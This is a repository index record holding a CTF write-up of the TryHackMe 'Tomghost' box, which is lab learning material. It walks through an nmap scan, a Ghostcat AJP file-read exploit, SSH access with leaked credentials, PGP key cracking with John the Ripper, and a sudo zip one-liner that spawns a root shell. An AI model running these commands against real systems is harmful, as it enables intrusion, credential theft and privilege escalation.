{"id":21897301,"url":"https://github.com/ccrashzer0/tomghost","last_synced_at":"2026-02-11T07:32:02.804Z","repository":{"id":247459998,"uuid":"275051370","full_name":"CCrashZer0/TomGhost","owner":"CCrashZer0","description":"Try Hack Me - TomGhost Write Up","archived":false,"fork":false,"pushed_at":"2020-07-06T01:34:25.000Z","size":615,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-09-03T10:39:08.016Z","etag":null,"topics":["ctf","ctf-writeups","cybersecurity","hacking","infosec","learning-by-doing","learning-exercise","tryhackme","tutorial","tutorial-exercises"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CCrashZer0.png","metadata":{"files":{"readme":"ReadMe.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-06-26T01:43:36.000Z","updated_at":"2023-04-11T15:30:21.000Z","dependencies_parsed_at":"2024-07-08T23:17:26.103Z","dependency_job_id":"dce73f5e-856a-435d-879c-a585adbd9850","html_url":"https://github.com/CCrashZer0/TomGhost","commit_stats":null,"previous_names":["ccrashzer0/tomghost"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/CCrashZer0/TomGhost","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CCrashZer0","download_url":"https://codeload.github.com/CCrashZer0/TomGhost/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29329493,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T06:13:03.264Z","status":"ssl_error","status_checked_at":"2026-02-11T06:12:55.843Z","response_time":97,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","ctf-writeups","cybersecurity","hacking","infosec","learning-by-doing","learning-exercise","tryhackme","tutorial","tutorial-exercises"],"created_at":"2024-11-28T14:16:53.649Z","updated_at":"2026-02-11T07:32:02.786Z","avatar_url":"https://github.com/CCrashZer0.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Try Hack Me - Tomghost\n\nIdentify recent vulnerabilities to try exploit the system or read files that you should not have access to. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.\n\n## Disclaimer -  Your IP address will be different!\n---\n\n## Scanning and Enumeration\n\nWe will start with running our nmap scan.  \nCommand: `nmap -A -T4 -sC -sV -oN nmap/initial.txt 10.10.93.77`\n\nCommand Breakdown:\n\n    -A: do an extensive scan on these ports\n\n\t-T4: speed of nmap scan is 4/5 (personal preference of mine)\n\n    -sC: Scan with default NSE scripts. Considered useful for discovery and safe\n\n\t-sV: Attempts to determine the version of the service running on port\n\n\t-oN: Normal output to the file normal.file\n\nOnce the results came back there was only one thing that appeared out of place to me and that was port 8009.  \n\nBy default, Apache Tomcat listens on 3 ports, 8005, 8009 and 8080. A common misconfiguration is blocking port 8080 but leaving ports 8005 or 8009 open for public access.  \n\n![nmapResulst](images/nmapresults.png \"NMAP\")\n\nWe will bu using the following tool to exploit this vulnerability.  \n[00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487)  \n\nCommand: `python3 ajpShooter.py http://10.10.93.77:8080 8009 /WEB-INF/web.xml read`\n\n![nmapRajpShooteresulst](images/ajpShooter.png \"ajpShooter\") \n\nIt would seems that we where able to find what seems to be both a user name and a password.  \n\nLet's look back at our nmap scan. Remeber that port 22 was open. We might be able to use these credentials to log into our box.  \n\nCommand: `ssh \u003cusername\u003e@10.10.93.77`  \nEnter in the password when you are prompted to and BLAM! we are connected under that user account.  \n\n![sfUser](images/sfUser.png \"sfUser\")  \nWhen we use the `ls` command we see that there are two files. Both of these files could be encryptions keys, but for right now we are going to look into the `/home` directory to see if we can find anything useful.  \n\n![merlin](images/merlin.png \"merlin\")  \nLet's keep digging and see if we an find anything else. If we `ls /home/merlin` you will see that it is here we find our first flag `user.txt`.  \n\n![userFlag](images/userFlag.png \"userFlag\")  \n\nNow we are going to return to pgp and asc file that we found in the `skyfuck` directory.  \nWe are going to all of these files to our host machine. In order to do this we will need to use the `scp` command.  \n\nWhen using the `scp` command you will want to run it on your host maching and not from the Tomghost VM.   \nCommand: `scp skyfuck@10.10.31.90:/home/skyfuck/* .`\n## Cracking the Hash\n---\nAfter running the `scp` command we now have both the credential.pgp and tryhackme.asc on our host maching.  \nThe next thing we want to do is use John The Ripper to get the hash from the `tryhackme.asc`.  \nHere is a good [video](https://www.youtube.com/watch?v=DBpd9e4tJfg) for recovering your PGP key with John.  \nCommand: `gpg2john tryhackme.asc \u003e hash`  \nOnce complete you can see that we now have our password. Lets make sure that we take note of that.  \n \nIt is now time for to crack open the hash that we collected eariler. This can be down by using John and combining it with the rockyou.txt wordlist.  \n\nFYI in order to find the location of your rockyou.txt word list just use `locate rockyou.txt`. Mind is located in the `/usr/share/wordlists/` directory.  \n\nCommand: `john --wordlist=/usr/share/wordlists/rockyou.txt hash`\n![passwd](images/passwd.png \"passwd\") \n\nIt seems that John was able to find out passphrase. Now we are going to use that phrase to import adn decrypt our PGP key that we have.\n```\ngpg --import tryhackme.asc\ngpg --decrypt credential.pgp\n```\n\n![merlinPasswd](images/merlinPasswd.png \"merlinPasswd\")  \nThings are starting to work in our favor.\nWe now have the password to the Merlin account.  \nSo we need to go back to our SSH shell and change from the skyfuck user to merlin, that can be done by using the `SU` command.  \n\nCommand: `su merlin`  \nOnce you are logged in as Merlin lets see if we have the abiliy to run anything as sudo.  \n`sudo -l`  \nIt seems that the only thing we can use sudo on is `/usr/bin/zip`  \nAfer a little bit of reasearch I found this [GitBook](https://d00mfist1.gitbooks.io/ctf/privilege_escalation_-_linux.html) on privilege escalation. Under the zip portion there was this oneliner that would allow us to gain access to a root shell.\n`sudo zip -q /tmp/test.zip cc0.txt -T -TT '/bin/sh #'`\n\n![shell](images/shell.png \"shell\")  \nOnce we have the shell we can us the `id` command to see that we are now running as a root user.  \n\nNow it is time to find the root.txt file.\n```\nls /root\ncat /root/root.txt\n```\n![rootFlag](images/rootFlag.png \"rootFlag\") \n\n# Congratulations you have just completed the Tomghost challenge!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccrashzer0%2Ftomghost","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fccrashzer0%2Ftomghost","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccrashzer0%2Ftomghost/lists"}